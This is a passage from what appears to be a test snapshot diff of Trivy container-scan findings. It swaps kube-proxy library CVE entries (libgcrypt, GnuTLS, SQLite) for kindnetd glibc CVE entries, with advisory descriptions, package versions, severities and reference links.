rtreenode()", + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-8457", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-8457", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", - }, - { - "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-8457.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1810.html", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", - }, - { - "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190606-0002/", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4004-1", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4004-2", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4019-1", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4019-2", - }, - { - "type": "URL", - "value": "https://usn.ubuntu.com/4004-1/", - }, - { - "type": "URL", - "value": "https://usn.ubuntu.com/4004-2/", - }, - { - "type": "URL", - "value": "https://usn.ubuntu.com/4019-1/", - }, - { - "type": "URL", - "value": "https://usn.ubuntu.com/4019-2/", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-8457", - }, - { - "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2020.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-9192", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2020.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-9192", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2020.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", }, { "type": "URL", - "value": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", }, { "type": "URL", - "value": "https://www.sqlite.org/releaselog/3_28_0.html", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.sqlite.org/src/info/90acdbfce9c08858", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33560", - "installedVersion": "1.8.7-6", - "packageName": "libgcrypt20", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-27645", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", - "https://access.redhat.com/security/cve/CVE-2021-33560", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", - "https://dev.gnupg.org/T5305", - "https://dev.gnupg.org/T5328", - "https://dev.gnupg.org/T5466", - "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", - "https://eprint.iacr.org/2021/923", - "https://errata.almalinux.org/8/ALSA-2021-4409.html", - "https://linux.oracle.com/cve/CVE-2021-33560.html", - "https://linux.oracle.com/errata/ELSA-2022-9263.html", - "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", - "https://security.gentoo.org/glsa/202210-13", - "https://ubuntu.com/security/notices/USN-5080-1", - "https://ubuntu.com/security/notices/USN-5080-2", - "https://www.cve.org/CVERecord?id=CVE-2021-33560", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://access.redhat.com/security/cve/CVE-2021-27645", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", + "https://linux.oracle.com/cve/CVE-2021-27645.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", + "https://security.gentoo.org/glsa/202107-07", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://www.cve.org/CVERecord?id=CVE-2021-27645", ], }, "category": "Vulnerability", - "description": "Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6) 2.29 through 2.33, when processing a request for netgroup lookup, may crash due to a double-free, potentially resulting in degraded service or Denial of Service on the local system. This is related to netgroupcache.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libgcrypt: mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm", + "name": "glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33560", - }, - { - "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33560", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", - }, - { - "type": "URL", - "value": "https://dev.gnupg.org/T5305", - }, - { - "type": "URL", - "value": "https://dev.gnupg.org/T5328", - }, - { - "type": "URL", - "value": "https://dev.gnupg.org/T5466", - }, - { - "type": "URL", - "value": "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", - }, - { - "type": "URL", - "value": "https://eprint.iacr.org/2021/923", - }, - { - "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4409.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33560.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9263.html", - }, - { - "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", - }, - { - "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-13", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-1", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-2", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33560", + "value": "https://avd.aquasec.com/nvd/cve-2021-27645", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-27645", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://linux.oracle.com/cve/CVE-2021-27645.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-6829", - "installedVersion": "1.8.7-6", - "packageName": "libgcrypt20", - "references": [ - "https://access.redhat.com/security/cve/CVE-2018-6829", - "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", - "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", - "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", - "https://www.cve.org/CVERecord?id=CVE-2018-6829", - "https://www.oracle.com/security-alerts/cpujan2020.html", - ], - }, - "category": "Vulnerability", - "description": "cipher/elgamal.c in Libgcrypt through 1.8.2, when used to encrypt messages directly, improperly encodes plaintexts, which allows attackers to obtain sensitive information by reading ciphertext data (i.e., it does not have semantic security in face of a ciphertext-only attack). The Decisional Diffie-Hellman (DDH) assumption does not hold for Libgcrypt's ElGamal implementation.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "libgcrypt: ElGamal implementation doesn't have semantic security due to incorrectly encoded plaintexts possibly allowing to obtain sensitive information", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-6829", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-6829", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", }, { "type": "URL", - "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", }, { "type": "URL", - "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", }, { "type": "URL", - "value": "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-6829", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2020.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-27645", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "3.7.1-5+deb11u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-2509", - "installedVersion": "3.7.1-5", - "packageName": "libgnutls30", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33574", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/errata/RHSA-2022:6854", - "https://access.redhat.com/security/cve/CVE-2022-2509", - "https://bugzilla.redhat.com/2108977", - "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", - "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", - "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", - "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", - "https://errata.almalinux.org/9/ALSA-2022-6854.html", - "https://errata.rockylinux.org/RLSA-2022:6854", - "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", - "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", - "https://linux.oracle.com/cve/CVE-2022-2509.html", - "https://linux.oracle.com/errata/ELSA-2022-7105.html", - "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", - "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", - "https://ubuntu.com/security/notices/USN-5550-1", - "https://www.cve.org/CVERecord?id=CVE-2022-2509", - "https://www.debian.org/security/2022/dsa-5203", + "https://access.redhat.com/security/cve/CVE-2021-33574", + "https://linux.oracle.com/cve/CVE-2021-33574.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210629-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", + "https://www.cve.org/CVERecord?id=CVE-2021-33574", ], }, "category": "Vulnerability", - "description": "A vulnerability found in gnutls. This security flaw happens because of a double free error occurs during verification of pkcs7 signatures in gnutls_pkcs7_verify function.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "Double free during gnutls_pkcs7_verify", + "name": "glibc: mq_notify does not handle separately allocated thread attributes", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2509", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6854", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2509", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2108977", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", - }, - { - "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6854.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-33574", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:6854", + "value": "https://access.redhat.com/security/cve/CVE-2021-33574", }, { "type": "URL", - "value": "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", + "value": "https://linux.oracle.com/cve/CVE-2021-33574.html", }, { "type": "URL", - "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-2509.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-7105.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", }, { "type": "URL", - "value": "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", + "value": "https://security.netapp.com/advisory/ntap-20210629-0005/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5550-1", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2509", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5203", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33574", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.7.1-5+deb11u3", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0361", - "installedVersion": "3.7.1-5", - "packageName": "libgnutls30", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-35942", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/errata/RHSA-2023:1141", - "https://access.redhat.com/security/cve/CVE-2023-0361", - "https://bugzilla.redhat.com/2162596", - "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", - "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", - "https://errata.almalinux.org/9/ALSA-2023-1141.html", - "https://errata.rockylinux.org/RLSA-2023:1569", - "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", - "https://gitlab.com/gnutls/gnutls/-/issues/1050", - "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", - "https://linux.oracle.com/cve/CVE-2023-0361.html", - "https://linux.oracle.com/errata/ELSA-2023-1569.html", - "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", - "https://security.netapp.com/advisory/ntap-20230324-0005/", - "https://ubuntu.com/security/notices/USN-5901-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0361", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", + "https://access.redhat.com/security/cve/CVE-2021-35942", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", + "https://linux.oracle.com/cve/CVE-2021-35942.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", + "https://security.gentoo.org/glsa/202208-24", + "https://security.netapp.com/advisory/ntap-20210827-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", + "https://sourceware.org/glibc/wiki/Security%20Exceptions", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5699-1", + "https://www.cve.org/CVERecord?id=CVE-2021-35942", ], }, "category": "Vulnerability", - "description": "A timing side-channel in the handling of RSA ClientKeyExchange messages was discovered in GnuTLS. This side-channel can be sufficient to recover the key encrypted in the RSA ciphertext across a network in a Bleichenbacher style attack. To achieve a successful decryption the attacker would need to send a large amount of specially crafted messages to the vulnerable server. By recovering the secret from the ClientKeyExchange message, the attacker would be able to decrypt the application data exchanged over that connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have been used to ensure correct calculations.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "timing side-channel in the TLS RSA key exchange code", + "name": "glibc: Arbitrary read in wordexp()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0361", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:1141", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0361", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2162596", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", + "value": "https://avd.aquasec.com/nvd/cve-2021-35942", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-1141.html", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:1569", + "value": "https://access.redhat.com/security/cve/CVE-2021-35942", }, { "type": "URL", - "value": "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1050", + "value": "https://linux.oracle.com/cve/CVE-2021-35942.html", }, { "type": "URL", - "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0361.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-1569.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", + "value": "https://security.gentoo.org/glsa/202208-24", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", + "value": "https://security.netapp.com/advisory/ntap-20210827-0005/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", + "value": "https://sourceware.org/glibc/wiki/Security%20Exceptions", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230324-0005/", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5901-1", + "value": "https://ubuntu.com/security/notices/USN-5699-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0361", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-35942", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.7.1-5+deb11u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-4209", - "installedVersion": "3.7.1-5", - "packageName": "libgnutls30", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-23218", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-4209", - "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", - "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", - "https://gitlab.com/gnutls/gnutls/-/issues/1306", - "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", - "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", - "https://security.netapp.com/advisory/ntap-20220915-0005/", - "https://ubuntu.com/security/notices/USN-5550-1", - "https://ubuntu.com/security/notices/USN-5750-1", - "https://www.cve.org/CVERecord?id=CVE-2021-4209", + "https://access.redhat.com/security/cve/CVE-2022-23218", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", + "https://linux.oracle.com/cve/CVE-2022-23218.html", + "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", + "https://security.gentoo.org/glsa/202208-24", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2022-23218", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "A NULL pointer dereference flaw was found in GnuTLS. As Nettle's hash update functions internally call memcpy, providing zero-length input may cause undefined behavior. This flaw leads to a denial of service after authentication in rare circumstances.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The deprecated compatibility function svcunix_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its path argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "GnuTLS: Null pointer dereference in MD_UPDATE", + "name": "glibc: Stack-based buffer overflow in svcunix_create via long pathnames", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-4209", + "value": "https://avd.aquasec.com/nvd/cve-2022-23218", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-4209", + "value": "https://access.redhat.com/security/cve/CVE-2022-23218", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", + "value": "https://linux.oracle.com/cve/CVE-2022-23218.html", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", + "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1306", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", + "value": "https://security.gentoo.org/glsa/202208-24", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220915-0005/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", }, { "type": "URL", - "value": 